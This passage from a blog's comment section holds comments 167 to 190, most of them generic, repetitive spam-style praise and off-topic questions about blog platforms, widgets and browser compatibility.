  167. Wow that was unusual. I just wrote an incredibly long comment but after I clicked submit my comment didn’t show up. Grrrr… well I’m not writing all that over again. Anyways, just wanted to say great blog!

  168. Aw, this was an incredibly nice post. Taking the time and actual effort to create a great article… but what can I say… I procrastinate a lot and never manage to get anything done.

  169. Can I simply say what a comfort to uncover somebody that actually understands what they’re discussing on the web. You certainly realize how to bring an issue to light and make it important. More and more people really need to read this and understand this side of your story. I was surprised that you aren’t more popular because you surely possess the gift.

  170. Hi there! This post could not be written much better! Looking at this article reminds me of my previous roommate! He continually kept talking about this. I’ll forward this post to him. Pretty sure he’s going to have a very good read. Many thanks for sharing!

  171. Hello would you mind stating which blog platform you’re working with? I’m looking to start my own blog soon but I’m having a difficult time selecting between BlogEngine/Wordpress/B2evolution and Drupal. The reason I ask is because your layout seems different then most blogs and I’m looking for something unique. P.S Apologies for getting off-topic but I had to ask!

  172. Simply desire to say your article is as astounding. The clarity in your post is just great and i can assume you’re an expert on this subject. Fine with your permission let me to grab your RSS feed to keep up to date with forthcoming post. Thanks a million and please carry on the rewarding work.

  173. Hey I know this is off topic but I was wondering if you knew of any widgets I could add to my blog that automatically tweet my newest twitter updates. I’ve been looking for a plug-in like this for quite some time and was hoping maybe you would have some experience with something like this. Please let me know if you run into anything. I truly enjoy reading your blog and I look forward to your new updates.

  174. Woah! I’m really enjoying the template/theme of this website. It’s simple, yet effective. A lot of times it’s very difficult to get that “perfect balance” between user friendliness and visual appeal. I must say you have done a great job with this. Also, the blog loads extremely fast for me on Internet explorer. Outstanding Blog!

  175. I am really loving the theme/design of your website. Do you ever run into any browser compatibility problems? A number of my blog readers have complained about my site not working correctly in Explorer but looks great in Opera. Do you have any suggestions to help fix this problem?

  176. Does your blog have a contact page? I’m having trouble locating it but, I’d like to send you an email. I’ve got some recommendations for your blog you might be interested in hearing. Either way, great blog and I look forward to seeing it improve over time.

  177. That is really fascinating, You are a very professional blogger. I’ve joined your rss feed and sit up for seeking more of your wonderful post. Additionally, I have shared your web site in my social networks

  178. Currently it sounds like Movable Type is the top blogging platform available right now. (from what I’ve read) Is that what you’re using on your blog?

  179. This design is incredible! You most certainly know how to keep a reader amused. Between your wit and your videos, I was almost moved to start my own blog (well, almost…HaHa!) Wonderful job. I really enjoyed what you had to say, and more than that, how you presented it. Too cool!

  180. Hey I know this is off topic but I was wondering if you knew of any widgets I could add to my blog that automatically tweet my newest twitter updates. I’ve been looking for a plug-in like this for quite some time and was hoping maybe you would have some experience with something like this. Please let me know if you run into anything. I truly enjoy reading your blog and I look forward to your new updates.

  181. Currently it sounds like Drupal is the best blogging platform available right now. (from what I’ve read) Is that what you’re using on your blog?

  182. Hi, I do believe this is a great blog. I stumbledupon it 😉 I am going to revisit yet again since i have book marked it. Money and freedom is the best way to change, may you be rich and continue to help other people.

  183. Hey I know this is off topic but I was wondering if you knew of any widgets I could add to my blog that automatically tweet my newest twitter updates. I’ve been looking for a plug-in like this for quite some time and was hoping maybe you would have some experience with something like this. Please let me know if you run into anything. I truly enjoy reading your blog and I look forward to your new updates.

  184. May I just say what a relief to discover a person that truly knows what they are discussing online. You definitely understand how to bring a problem to light and make it important. More people should look at this and understand this side of your story. It’s surprising you’re not more popular given that you definitely possess the gift.

  185. Hey there, You’ve done an incredible job. I’ll certainly digg it and in my opinion recommend to my friends. I am confident they will be benefited from this site.

  186. Hey I know this is off topic but I was wondering if you knew of any widgets I could add to my blog that automatically tweet my newest twitter updates. I’ve been looking for a plug-in like this for quite some time and was hoping maybe you would have some experience with something like this. Please let me know if you run into anything. I truly enjoy reading your blog and I look forward to your new updates.

  187. Hello there, I found your website via Google at the same time as looking for a comparable subject, your web site got here up, it appears to be like good. I have bookmarked it in my google bookmarks

  188. Aw, this was an incredibly nice post. Finding the time and actual effort to produce a top notch article… but what can I say… I procrastinate a whole lot and don’t seem to get nearly anything done.

  189. Hey there, You have performed an incredible job. I’ll certainly digg it and personally recommend to my friends. I’m sure they’ll be benefited from this website.

  190. Hey there, You have done an incredible job. I will definitely digg it and for my part suggest to my friends. I am confident they’ll be benefited from this site.

Leave a Reply

Your email address will not be published. Required fields are marked *